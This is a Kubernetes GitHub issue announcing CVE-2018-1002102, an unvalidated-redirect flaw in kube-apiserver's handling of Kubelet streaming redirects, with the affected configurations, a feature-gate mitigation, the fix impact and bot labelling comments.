Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2018-1002102: Unvalidated redirect #85867

Closed
tallclair opened this issue Dec 3, 2019 · 3 comments
Closed

CVE-2018-1002102: Unvalidated redirect #85867

tallclair opened this issue Dec 3, 2019 · 3 comments
Labels
area/apiserver area/security committee/security-response Denotes an issue or PR intended to be handled by the product security committee. kind/bug Categorizes issue or PR as related to a bug. official-cve-feed Issues or PRs related to CVEs officially announced by Security Response Committee (SRC) sig/api-machinery Categorizes an issue or PR as relevant to SIG API Machinery. sig/node Categorizes an issue or PR as relevant to SIG Node.

Comments

@tallclair
Copy link
Member

CVSS Rating: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)

An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet.

Am I vulnerable?

Kubernetes API servers with the StreamingProxyRedirects feature enabled AND without the ValidateProxyRedirects feature are affected.

API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected.

Using the default feature gate values, kube-apiserver versions before v1.14 are affected.

How do I mitigate this vulnerability?

For Kubernetes versions >= v1.10.0, the ValidateProxyRedirects can be manually enabled with the kube-apiserver flag --feature-gates=ValidateProxyRedirects=true.

Fix impact

The ValidateProxyRedirects feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag --redirect-container-streaming=true), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting --redirect-container-streaming=false on the kubelet to avoid issues.

Fixed Versions

Additional Details

In a future release, we plan to deprecate the StreamingProxyRedirects feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests).

Acknowledgements

This vulnerability was reported by Alban Crequy.

/area security
/kind bug
/committee product-security
/sig api-machinery node
/area apiserver

/close
@k8s-ci-robot
Copy link
Contributor

@tallclair: Closing this issue.

In response to this:

CVSS Rating: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)

An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet.

Am I vulnerable?

Kubernetes API servers with the StreamingProxyRedirects feature enabled AND without the ValidateProxyRedirects feature are affected.

API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected.

Using the default feature gate values, kube-apiserver versions before v1.14 are affected.

How do I mitigate this vulnerability?

For Kubernetes versions >= v1.10.0, the ValidateProxyRedirects can be manually enabled with the kube-apiserver flag --feature-gates=ValidateProxyRedirects=true.

Fix impact

The ValidateProxyRedirects feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag --redirect-container-streaming=true), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting --redirect-container-streaming=false on the kubelet to avoid issues.

Fixed Versions

Additional Details

In a future release, we plan to deprecate the StreamingProxyRedirects feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests).

Acknowledgements

This vulnerability was reported by Alban Crequy.

/area security
/kind bug
/committee product-security
/sig api-machinery node
/area apiserver

/close

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@k8s-ci-robot k8s-ci-robot added kind/bug Categorizes issue or PR as related to a bug. committee/security-response Denotes an issue or PR intended to be handled by the product security committee. sig/api-machinery Categorizes an issue or PR as relevant to SIG API Machinery. sig/node Categorizes an issue or PR as relevant to SIG Node. area/apiserver labels Dec 3, 2019
@PushkarJ
Copy link
Member

PushkarJ commented Dec 2, 2021

/label official-cve-feed

(testing the new label from kubernetes/test-infra#23428)

@k8s-ci-robot k8s-ci-robot added the official-cve-feed Issues or PRs related to CVEs officially announced by Security Response Committee (SRC) label Dec 2, 2021
@PushkarJ
Copy link
Member

PushkarJ commented Dec 2, 2021

Related kubernetes/sig-security#1

@k8s-sec-alert k8s-sec-alert mentioned this issue Sep 18, 2022
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
area/apiserver area/security committee/security-response Denotes an issue or PR intended to be handled by the product security committee. kind/bug Categorizes issue or PR as related to a bug. official-cve-feed Issues or PRs related to CVEs officially announced by Security Response Committee (SRC) sig/api-machinery Categorizes an issue or PR as relevant to SIG API Machinery. sig/node Categorizes an issue or PR as relevant to SIG Node.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@PushkarJ @k8s-ci-robot @tallclair